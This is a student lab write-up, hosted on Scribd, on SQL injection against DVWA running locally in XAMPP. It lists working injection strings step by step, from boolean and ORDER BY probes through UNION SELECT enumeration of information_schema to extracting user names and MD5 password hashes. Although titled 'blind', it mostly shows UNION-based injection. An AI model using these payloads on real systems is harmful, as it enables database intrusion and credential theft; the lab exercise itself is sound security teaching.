Scribd Logo
Upload

Welcome to Scribd!

  • Lab 10

    Uploaded by

    tài nguyễn
    1 views11 pages
    This document provides steps to exploit blind SQL injection vulnerabilities using the ORDER BY clause. It describes downloading and setting up required software like XAMPP, DVWA, and browsers. The implementation steps demonstrate injecting SQL queries to extract database and table names, column names, and even user passwords by abusing the ORDER BY clause to optimize the blind SQL injection attack.

    Original Description:

    23 R Q3 GETR GET G

    Copyright

    © © All Rights Reserved

    Available Formats

    DOCX, PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    This document provides steps to exploit blind SQL injection vulnerabilities using the ORDER BY clause. It describes downloading and setting up required software like XAMPP, DVWA, and browsers. The implementation steps demonstrate injecting SQL queries to extract database and table names, column names, and even user passwords by abusing the ORDER BY clause to optimize the blind SQL injection attack.

    Copyright:

    © All Rights Reserved
    Download as DOCX, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    1 views11 pages

    Lab 10

    Uploaded by

    tài nguyễn
    This document provides steps to exploit blind SQL injection vulnerabilities using the ORDER BY clause. It describes downloading and setting up required software like XAMPP, DVWA, and browsers. The implementation steps demonstrate injecting SQL queries to extract database and table names, column names, and even user passwords by abusing the ORDER BY clause to optimize the blind SQL injection attack.

    Copyright:

    © All Rights Reserved
    Download as DOCX, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 11

    LAB 12

    BLIND SQL INJECTION

    1. Introduction
    In the form of SQL injection attacks, Blind SQL injection is a very
    common form. Derived from the optimization of the Blind SQL injection
    vulnerability in queries using the ORDER BY clause, this article covers methods
    for exploiting, optimizing Blind SQL injection in general, and Blind SQL
    vulnerabilities in queries. Use the ORDER BY clause in particular and offer a new
    perspective and approach to optimizing this attack.

    2. Preparation
    - Computer running windows operating system. Require to disable the firewall on
    the system.
    - The source code management mysql - phpmyadmin
    https://www.phpmyadmin.net/downloads/
    - XAMPP download by following link:
    https://downloadsapachefriends.global.ssl.fastly.net/xampp-files/5.6.31/xampp-
    win32-5.6.31-0-VC11-installer.exe?from_af=true
    - DVWA download the following link:
    http://www.dvwa.co.uk/
    - The browser software chrome, firefox 10.0, 7zip, Notepadd ++.

    3. Implementation steps
    - Turn on xampp and go to 192.168.100.15/DVWA. Login with user: admin. Pass:
    password. Here 192.168.100.15 is ipv4 machine running dvwa
    - Login successful we select dvwa security > Chọn low and submit
    - Type : 1 submit

    - Type : 1’ and 1=1 #


    submit. We see First name: admin. Surname: admin
    - Type: 1’ and 1=0 # submit. We see nothing

    - Type: 1’ and 1=0 order by 2 # submit. We still see nothing


    - Type: 1’ and 1=1 order by 1 #
    submit. We see as in picture. First name: admin. Surname: admin

    - Type: 1’ and 1=0 union select 1,2 #


    submit. We see First name: 1 . Surname: 2
    - Type: 1’ and 1=0 union select null,substring(@@version,1,1)=4 #
    submit. We see First name: . Surname: 0
    - Type: 1’ and 1=0 union select null,substring(@@version,1,1)=5 #
    submit. We see First name: . Surname: 0

    - Type: 1’ and 1=0 union select null,table_name from


    information_schema.tables #
    submit. We see as in picture, every tables name have in database
    - Type: 1’ and 1=0 union select null,table_name from
    information_schema.columns where table_name=“user” #
    submit and surname: user
    - Type: 1’ and 1=0 union select
    null,concat(table_name,0x0a,column_name) from
    information_schema.columns where table_name=“user” #
    submit. We see every columns in table user.
    - We see in the table user a column named User and Password
    Type: 1’ and 1=0 union select null,concat(first_name,0x0a,password) from users #
    submit. We see surname as user. And below is pass md5

    You might also like